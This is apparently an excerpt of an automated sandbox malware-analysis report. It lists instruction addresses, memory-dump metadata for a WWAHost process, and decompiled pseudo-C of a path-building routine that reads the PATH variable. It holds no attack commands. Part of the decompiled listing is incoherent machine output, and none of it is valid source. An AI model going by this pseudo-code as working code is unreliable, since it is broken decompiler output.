                                              0x039b483d
                                              0x039b483f
                                              0x039b4842
                                              0x039b4842
                                              0x039b4842
                                              0x039b4846
                                              0x039b484c
                                              0x039b484e
                                              0x039b4851
                                              0x039b4851
                                              0x039b4853
                                              0x039b4854
                                              0x039b4854
                                              0x039b4858
                                              0x039b485a
                                              0x039b485a
                                              0x039b485d
                                              0x039b485f
                                              0x039b4861
                                              0x039b4861
                                              0x039b4866
                                              0x039b486b
                                              0x039b486e
                                              0x039b4871
                                              0x039b4876
                                              0x039b4876
                                              0x039b4878
                                              0x039b487b
                                              0x039b4884
                                              0x039b4884
                                              0x00000000
                                              0x039b487d
                                              0x039b487d
                                              0x039b4882
                                              0x039b4889
                                              0x039b4889
                                              0x039b488f
                                              0x039b4891
                                              0x039b48e0
                                              0x039b48e2
                                              0x039b48e4
                                              0x039b48e4
                                              0x039b48e7
                                              0x039b48e7
                                              0x039b48ed
                                              0x039b48f4
                                              0x039b48f6
                                              0x039b4951
                                              0x039b4951
                                              0x039b4953
                                              0x039b4953
                                              0x039b4956
                                              0x039b4956
                                              0x039b4958
                                              0x039b4959
                                              0x039b4959
                                              0x039b495d
                                              0x039b495d
                                              0x039b495f
                                              0x039b495f
                                              0x039b4965
                                              0x039b4969
                                              0x039b49ba
                                              0x039b49ba
                                              0x039b49c1
                                              0x039b49c5
                                              0x039b49cc
                                              0x039b49d4
                                              0x039b49d7
                                              0x039b49da
                                              0x039b49e4
                                              0x039b49e5
                                              0x039b49f3
                                              0x039b4a02
                                              0x00000000
                                              0x039b4a02
                                              0x039b4972
                                              0x039b4974
                                              0x00000000
                                              0x00000000
                                              0x039b4976
                                              0x039b4979
                                              0x039b4982
                                              0x039b4983
                                              0x039b4984
                                              0x039b498b
                                              0x039b498d
                                              0x039b4991
                                              0x039b4993
                                              0x039b4999
                                              0x039b499d
                                              0x039b49a2
                                              0x039b49a2
                                              0x039b49a2
                                              0x039b4999
                                              0x039b49ac
                                              0x00000000
                                              0x039b49b3
                                              0x039b48f8
                                              0x039b48fe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b48fe
                                              0x039b4895
                                              0x039b489c
                                              0x039b48ad
                                              0x039b48b2
                                              0x039b48b5
                                              0x039b48b7
                                              0x039b48ba
                                              0x039b48bc
                                              0x039b48c6
                                              0x039b48c6
                                              0x039b48cb
                                              0x039b48d1
                                              0x039b48d4
                                              0x039b48d8
                                              0x039b48d8
                                              0x00000000
                                              0x039b48d8
                                              0x039b48be
                                              0x039b48c0
                                              0x00000000
                                              0x00000000
                                              0x039b48c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b48c4
                                              0x00000000
                                              0x039b4882
                                              0x039b487b
                                              0x039b4904
                                              0x039b4906
                                              0x00000000
                                              0x00000000
                                              0x039b4908
                                              0x039b490e
                                              0x00000000
                                              0x00000000
                                              0x039b4910
                                              0x039b4917
                                              0x039b4917
                                              0x00000000
                                              0x039b4917
                                              0x0395b1ba
                                              0x039b47f9
                                              0x039b47fc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b47fc
                                              0x0395b1c0
                                              0x0395b1c0
                                              0x0395b1c3
                                              0x0395b1cb
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: _vswprintf_s
                                              • String ID:
                                              • API String ID: 677850445-0
                                              • Opcode ID: d78aafa3b54a4c7c0e2af1b6b5ba58c5cf9b339b781cc1d56378971a5ceb5ad2
                                              • Instruction ID: b08a18af55cb481fbd416bb24a8479ef600a932050d221481f20d0d1414c7eb9
                                              • Opcode Fuzzy Hash: d78aafa3b54a4c7c0e2af1b6b5ba58c5cf9b339b781cc1d56378971a5ceb5ad2
                                              • Instruction Fuzzy Hash: 1351E175D042698FEF31CF69CA40BFEBBB8AF40750F1441A9E859AB282D7304D41EB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03982581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E03982581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35, char _a1530200980, char _a1546912660) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t236;
				signed int _t240;
				signed int _t242;
				void* _t248;
				void* _t249;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				intOrPtr _t284;
				signed int _t286;
				signed int _t288;
				void* _t289;
				void* _t293;
				signed int _t294;
				unsigned int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t308;
				intOrPtr _t321;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t337;
				signed int _t338;
				intOrPtr* _t340;
				void* _t341;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				void* _t348;
				void* _t351;

				_t344 = _t347;
				_t348 = _t347 - 0x4c;
				_v8 =  *0x3a4d360 ^ _t344;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t337 = 0x3a4b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t297 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t318 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t330 = 0;
				_v37 = _t318;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t338 = 0xc0000106;
						goto L32;
					} else {
						_t337 = L03974620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t337;
						__eflags = _t337;
						if(_t337 == 0) {
							_t338 = 0xc0000017;
							goto L32;
						} else {
							 *(_t337 + 0x44) =  *(_t337 + 0x44) & 0x00000000;
							_t50 = _t337 + 0x48; // 0x48
							_t332 = _t50;
							_t318 = _v32;
							 *((intOrPtr*)(_t337 + 0x3c)) = _t284;
							_t286 = 0;
							 *((short*)(_t337 + 0x30)) = _v48;
							__eflags = _t318;
							if(_t318 != 0) {
								 *(_t337 + 0x18) = _t332;
								__eflags = _t318 - 0x3a48478;
								 *_t337 = ((0 | _t318 == 0x03a48478) - 0x00000001 & 0xfffffffb) + 7;
								E0399F3E0(_t332,  *((intOrPtr*)(_t318 + 4)),  *_t318 & 0x0000ffff);
								_t318 = _v32;
								_t348 = _t348 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t332 = _t332 + (( *_t318 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E039E39F2(_t332);
									_t318 = _v32;
									_t332 = _t278;
								}
							}
							_t301 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t338 = _v68;
								__eflags = 0;
								 *((short*)(_t332 - 2)) = 0;
								goto L32;
							} else {
								_t288 = _t337 + _t286 * 4;
								_v56 = _t288;
								do {
									__eflags = _t318;
									if(_t318 != 0) {
										_t236 =  *(_v60 + _t301 * 4);
										__eflags = _t236;
										if(_t236 == 0) {
											goto L30;
										} else {
											__eflags = _t236 == 5;
											if(_t236 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t288 =  *(_v60 + _t301 * 4);
										 *(_t288 + 0x18) = _t332;
										_t240 =  *(_v60 + _t301 * 4);
										__eflags = _t240 - 8;
										if(_t240 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t240 * 4 +  &M03982959))) {
												case 0:
													__ax =  *0x3a48488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0399F3E0(__edi,  *0x3a4848c, __ax & 0x0000ffff);
														__eax =  *0x3a48488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0399F3E0(_t332, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0x3a48480 & 0x0000ffff = E0399F3E0(__edi,  *0x3a48484,  *0x3a48480 & 0x0000ffff);
													__eax =  *0x3a48480 & 0x0000ffff;
													__eax = ( *0x3a48480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0399F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0399F3E0(_t332, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t348 = _t348 + 0xc;
													_t332 = _t332 + (_t273 >> 1) * 2 + 2;
													__eflags = _t332;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t332 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0399F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3a48478 & 0x0000ffff = E0399F3E0(__edi,  *0x3a4847c,  *0x3a48478 & 0x0000ffff);
													__eax =  *0x3a48478 & 0x0000ffff;
													__eax = ( *0x3a48478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E039E39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3a46e58 & 0x0000ffff = E0399F3E0(__edi,  *0x3a46e5c,  *0x3a46e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3a46e58 & 0x0000ffff;
													__eax = ( *0x3a46e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t301 = _v16;
													_t318 = _v32;
													L29:
													_t288 = _t288 + 4;
													__eflags = _t288;
													_v56 = _t288;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t301 = _t301 + 1;
									_v16 = _t301;
									__eflags = _t301 - _v48;
								} while (_t301 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t240 =  *(_v60 + _t330 * 4);
						if(_t240 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t240 * 4 +  &M03982935))) {
							case 0:
								__ax =  *0x3a48488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t318 =  &_v64;
								_v80 = E03982E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3a48480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3a48480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0396EEF0(0x3a479a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0396EB70(__ecx, 0x3a479a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t214 = _v72;
											__eflags = _t214;
											if(_t214 != 0) {
												L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
											}
											_t215 = _v52;
											__eflags = _t215;
											if(_t215 != 0) {
												__eflags = _t338;
												if(_t338 < 0) {
													L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
													_t215 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t297 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3a47b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0396EB70(__ecx, 0x3a479a0);
										__eax = _v52;
										L36:
										_pop(_t331);
										_pop(_t339);
										__eflags = _v8 ^ _t344;
										_pop(_t285);
										return E0399B640(_t215, _t285, _v8 ^ _t344, _t318, _t331, _t339);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t318 =  &_v36;
									_t282 = E03982E3E(_t280,  &_v36);
									_t297 = _v36;
									_v76 = _t282;
								}
								if(_t297 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t297;
								}
								goto L14;
							case 6:
								__eax =  *0x3a45764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3a48478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3a48478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3a46e58 & 0x0000ffff;
								__eax = ( *0x3a46e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t330 = _t330 + 1;
								if(_t330 >= _v48) {
									goto L16;
								} else {
									_t318 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t242 = _t240;
					_t351 = _t348 +  *((intOrPtr*)(_t337 + 0x28)) + _t242;
					asm("daa");
					_t289 = 0x25;
					asm("pushfd");
					asm("pushfd");
					_t248 = _t242 +  *((intOrPtr*)(_t337 + 0x28)) +  *0x1f039826 +  *((intOrPtr*)(_t318 +  *((intOrPtr*)(_t242 +  *((intOrPtr*)(_t337 + 0x28)) +  *0x1f039826 +  &_a1530200980))));
					 *((intOrPtr*)(_t248 - 0x67d77ffd)) =  *((intOrPtr*)(_t248 - 0x67d77ffd)) - _t289;
					_t340 = _t337 + _t337;
					asm("daa");
					_t249 = _t248;
					 *((intOrPtr*)(_t249 - 0x67d7b1fd)) =  *((intOrPtr*)(_t249 - 0x67d7b1fd)) - _t289 +  *_t340;
					_pop(_t293);
					asm("pushfd");
					_t341 = _t340 +  *((intOrPtr*)(_t249 +  &_a1546912660));
					asm("pushfd");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x3a2ff00);
					E039AD08C(_t293, _t332, _t341);
					_v44 =  *[fs:0x18];
					_t333 = 0;
					 *_a24 = 0;
					_t294 = _a12;
					__eflags = _t294;
					if(_t294 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t342 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t308 = _t255 * 0xc;
							_v48 = _t308;
							__eflags = _t294 -  *((intOrPtr*)(_t308 + 0x3931664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E0399E5C0(_a8,  *((intOrPtr*)(_t308 + 0x3931668)), _t294);
									_t351 = _t351 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t342 = E039D51BE(_t294,  *((intOrPtr*)(_v48 + 0x393166c)), _a16, _t333, _t342, __eflags, _a20, _a24);
										_v52 = _t342;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t342;
						__eflags = _t342;
						if(_t342 < 0) {
							__eflags = _t342 - 0xc0000100;
							if(_t342 == 0xc0000100) {
								_t304 = _a4;
								__eflags = _t304;
								if(_t304 != 0) {
									_v36 = _t304;
									__eflags =  *_t304 - _t333;
									if( *_t304 == _t333) {
										_t342 = 0xc0000100;
										goto L76;
									} else {
										_t321 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t321 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t304;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t304) {
											__eflags =  *(_t321 + 0x1c);
											if( *(_t321 + 0x1c) == 0) {
												L106:
												_t342 = E03982AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
												_v32 = _t342;
												__eflags = _t342 - 0xc0000100;
												if(_t342 != 0xc0000100) {
													goto L69;
												} else {
													_t333 = 1;
													_t304 = _v36;
													goto L75;
												}
											} else {
												_t260 = E03966600( *(_t321 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t304 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t342 = E03982C50(_t304, _a8, _t294, _a16, _a20, _a24, _t333);
											L76:
											_v32 = _t342;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t342 = _a24;
									_t267 = E03982AE4( &_v36, _a8, _t294, _a16, _a20, _t342);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E03982C50(_v36, _a8, _t294, _a16, _a20, _t342, 1);
									}
									_v8 = _t333;
									E03982ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t342;
					}
					L70:
					return E039AD0D1(_t253);
				}
				L108:
			}
























































                                              0x03982584
                                              0x03982586
                                              0x03982590
                                              0x03982596
                                              0x03982597
                                              0x03982598
                                              0x03982599
                                              0x0398259e
                                              0x039825a4
                                              0x039825a9
                                              0x039825ac
                                              0x039825ae
                                              0x039825b1
                                              0x039825b2
                                              0x039825b5
                                              0x039825b8
                                              0x039825bb
                                              0x039825bc
                                              0x039825bf
                                              0x039825c2
                                              0x039825c5
                                              0x039825c6
                                              0x039825cb
                                              0x039825ce
                                              0x039825d8
                                              0x039825dd
                                              0x039825de
                                              0x039825e1
                                              0x039825e3
                                              0x039825e9
                                              0x039826da
                                              0x039826da
                                              0x039826dd
                                              0x039826e2
                                              0x039c5b56
                                              0x00000000
                                              0x039826e8
                                              0x039826f9
                                              0x039826fb
                                              0x039826fe
                                              0x03982700
                                              0x039c5b60
                                              0x00000000
                                              0x03982706
                                              0x03982706
                                              0x0398270a
                                              0x0398270a
                                              0x0398270d
                                              0x03982713
                                              0x03982716
                                              0x03982718
                                              0x0398271c
                                              0x0398271e
                                              0x039c5b6c
                                              0x039c5b6f
                                              0x039c5b7f
                                              0x039c5b89
                                              0x039c5b8e
                                              0x039c5b93
                                              0x039c5b96
                                              0x039c5b9c
                                              0x039c5ba0
                                              0x039c5ba3
                                              0x039c5bab
                                              0x039c5bb0
                                              0x039c5bb3
                                              0x039c5bb3
                                              0x039c5ba3
                                              0x03982724
                                              0x03982726
                                              0x03982729
                                              0x0398272c
                                              0x0398279d
                                              0x0398279d
                                              0x039827a0
                                              0x039827a2
                                              0x00000000
                                              0x0398272e
                                              0x0398272e
                                              0x03982731
                                              0x03982734
                                              0x03982734
                                              0x03982736
                                              0x039c5bc1
                                              0x039c5bc1
                                              0x039c5bc4
                                              0x00000000
                                              0x039c5bca
                                              0x039c5bca
                                              0x039c5bcd
                                              0x00000000
                                              0x039c5bd3
                                              0x00000000
                                              0x039c5bd3
                                              0x039c5bcd
                                              0x0398273c
                                              0x0398273c
                                              0x03982742
                                              0x03982747
                                              0x0398274a
                                              0x0398274d
                                              0x03982750
                                              0x00000000
                                              0x03982756
                                              0x03982756
                                              0x00000000
                                              0x03982902
                                              0x03982908
                                              0x0398290b
                                              0x00000000
                                              0x03982911
                                              0x0398291c
                                              0x03982921
                                              0x00000000
                                              0x03982921
                                              0x00000000
                                              0x00000000
                                              0x03982880
                                              0x03982887
                                              0x0398288c
                                              0x00000000
                                              0x00000000
                                              0x03982805
                                              0x0398280a
                                              0x03982814
                                              0x03982816
                                              0x00000000
                                              0x00000000
                                              0x0398281e
                                              0x03982821
                                              0x03982823
                                              0x00000000
                                              0x03982829
                                              0x03982829
                                              0x03982831
                                              0x0398283c
                                              0x0398283e
                                              0x00000000
                                              0x0398283e
                                              0x00000000
                                              0x00000000
                                              0x0398284e
                                              0x03982850
                                              0x03982851
                                              0x03982854
                                              0x03982857
                                              0x0398285a
                                              0x0398285c
                                              0x0398285d
                                              0x00000000
                                              0x00000000
                                              0x0398275d
                                              0x03982761
                                              0x00000000
                                              0x03982767
                                              0x0398276e
                                              0x03982773
                                              0x03982773
                                              0x03982776
                                              0x03982778
                                              0x0398277e
                                              0x0398277e
                                              0x03982781
                                              0x03982781
                                              0x03982783
                                              0x03982784
                                              0x00000000
                                              0x00000000
                                              0x039c5bd8
                                              0x039c5bde
                                              0x039c5be4
                                              0x039c5be6
                                              0x039c5be8
                                              0x039c5be9
                                              0x039c5bee
                                              0x039c5bf8
                                              0x039c5bff
                                              0x039c5c01
                                              0x039c5c04
                                              0x039c5c07
                                              0x039c5c0b
                                              0x039c5c0d
                                              0x039c5c0d
                                              0x039c5c15
                                              0x039c5c18
                                              0x039c5c1b
                                              0x039c5c1b
                                              0x039c5c1e
                                              0x00000000
                                              0x00000000
                                              0x039828c3
                                              0x039828c8
                                              0x039828d2
                                              0x039828d4
                                              0x039828d8
                                              0x039828db
                                              0x039c5c26
                                              0x039c5c28
                                              0x039c5c2d
                                              0x039c5c2d
                                              0x00000000
                                              0x00000000
                                              0x039c5c34
                                              0x039c5c36
                                              0x039c5c49
                                              0x039c5c4e
                                              0x039c5c54
                                              0x039c5c5b
                                              0x039c5c5d
                                              0x039c5c60
                                              0x03982788
                                              0x03982788
                                              0x0398278b
                                              0x0398278e
                                              0x0398278e
                                              0x0398278e
                                              0x03982791
                                              0x00000000
                                              0x00000000
                                              0x03982756
                                              0x03982750
                                              0x00000000
                                              0x03982794
                                              0x03982794
                                              0x03982795
                                              0x03982798
                                              0x03982798
                                              0x00000000
                                              0x03982734
                                              0x0398272c
                                              0x03982700
                                              0x039825ef
                                              0x039825ef
                                              0x039825ef
                                              0x039825f2
                                              0x039825f8
                                              0x00000000
                                              0x00000000
                                              0x039825fe
                                              0x00000000
                                              0x039828e6
                                              0x039828ec
                                              0x039828ef
                                              0x039828f5
                                              0x039828f8
                                              0x039828f8
                                              0x00000000
                                              0x039828f8
                                              0x00000000
                                              0x00000000
                                              0x03982866
                                              0x03982866
                                              0x03982876
                                              0x03982879
                                              0x00000000
                                              0x00000000
                                              0x039827e0
                                              0x039827e7
                                              0x039827e9
                                              0x039827eb
                                              0x039c5afd
                                              0x00000000
                                              0x039c5afd
                                              0x00000000
                                              0x00000000
                                              0x03982633
                                              0x03982638
                                              0x0398263b
                                              0x0398263c
                                              0x0398263e
                                              0x03982640
                                              0x03982642
                                              0x03982647
                                              0x03982649
                                              0x0398264e
                                              0x03982650
                                              0x03982653
                                              0x03982659
                                              0x039826a2
                                              0x039826a7
                                              0x039826ac
                                              0x039826b2
                                              0x039c5b11
                                              0x039c5b15
                                              0x039c5b17
                                              0x00000000
                                              0x039826b8
                                              0x039826b8
                                              0x039826ba
                                              0x039827a6
                                              0x039827a6
                                              0x039827a9
                                              0x039827ab
                                              0x039827b9
                                              0x039827b9
                                              0x039827be
                                              0x039827c1
                                              0x039827c3
                                              0x039827c5
                                              0x039827c7
                                              0x039c5c74
                                              0x039c5c79
                                              0x039c5c79
                                              0x039827c7
                                              0x00000000
                                              0x039826c0
                                              0x039826c0
                                              0x039826c3
                                              0x039826c6
                                              0x039826c6
                                              0x039826c9
                                              0x039826c9
                                              0x00000000
                                              0x039826c9
                                              0x039826ba
                                              0x0398265b
                                              0x0398265b
                                              0x0398265e
                                              0x03982667
                                              0x0398266d
                                              0x03982677
                                              0x0398267c
                                              0x0398267f
                                              0x03982681
                                              0x039c5b49
                                              0x039c5b4e
                                              0x039827cd
                                              0x039827d0
                                              0x039827d1
                                              0x039827d2
                                              0x039827d4
                                              0x039827dd
                                              0x03982687
                                              0x03982687
                                              0x0398268a
                                              0x0398268b
                                              0x0398268e
                                              0x0398268f
                                              0x03982691
                                              0x03982696
                                              0x03982698
                                              0x0398269d
                                              0x0398269f
                                              0x00000000
                                              0x0398269f
                                              0x03982681
                                              0x00000000
                                              0x00000000
                                              0x03982846
                                              0x00000000
                                              0x00000000
                                              0x03982605
                                              0x0398260a
                                              0x0398260c
                                              0x03982611
                                              0x03982616
                                              0x03982619
                                              0x03982619
                                              0x0398261e
                                              0x00000000
                                              0x03982624
                                              0x03982627
                                              0x03982627
                                              0x00000000
                                              0x00000000
                                              0x039c5b1f
                                              0x00000000
                                              0x00000000
                                              0x03982894
                                              0x0398289b
                                              0x0398289d
                                              0x039828a1
                                              0x039c5b2b
                                              0x039c5b2e
                                              0x039c5b2e
                                              0x039828a7
                                              0x039828a9
                                              0x039c5b04
                                              0x039c5b09
                                              0x039c5b09
                                              0x039c5b09
                                              0x00000000
                                              0x00000000
                                              0x039c5b35
                                              0x039c5b3c
                                              0x039828fb
                                              0x039828fb
                                              0x039826cc
                                              0x039826cc
                                              0x039826d0
                                              0x00000000
                                              0x039826d2
                                              0x039826d2
                                              0x00000000
                                              0x039826d2
                                              0x00000000
                                              0x00000000
                                              0x039825fe
                                              0x0398292d
                                              0x03982930
                                              0x03982935
                                              0x0398293b
                                              0x0398293c
                                              0x0398293e
                                              0x0398294e
                                              0x0398294f
                                              0x03982957
                                              0x03982958
                                              0x0398295a
                                              0x03982960
                                              0x03982962
                                              0x03982963
                                              0x03982966
                                              0x03982972
                                              0x03982973
                                              0x03982974
                                              0x0398297b
                                              0x0398297e
                                              0x0398297f
                                              0x03982980
                                              0x03982981
                                              0x03982982
                                              0x03982983
                                              0x03982984
                                              0x03982985
                                              0x03982986
                                              0x03982987
                                              0x03982988
                                              0x03982989
                                              0x0398298a
                                              0x0398298b
                                              0x0398298c
                                              0x0398298d
                                              0x0398298e
                                              0x0398298f
                                              0x03982990
                                              0x03982992
                                              0x03982997
                                              0x039829a3
                                              0x039829a6
                                              0x039829ab
                                              0x039829ad
                                              0x039829b0
                                              0x039829b2
                                              0x039c5c80
                                              0x039829b8
                                              0x039829b8
                                              0x039829bb
                                              0x039829c0
                                              0x039829c5
                                              0x039829c6
                                              0x039829c6
                                              0x039829c9
                                              0x039829cb
                                              0x00000000
                                              0x00000000
                                              0x039829cd
                                              0x039829d0
                                              0x039829d9
                                              0x039829db
                                              0x039829dd
                                              0x03982a7f
                                              0x03982a84
                                              0x03982a87
                                              0x03982a89
                                              0x039c5ca1
                                              0x039c5ca3
                                              0x00000000
                                              0x03982a8f
                                              0x03982a8f
                                              0x00000000
                                              0x03982a8f
                                              0x00000000
                                              0x039829e3
                                              0x039829e3
                                              0x039829e3
                                              0x00000000
                                              0x039829e3
                                              0x039829dd
                                              0x00000000
                                              0x039829db
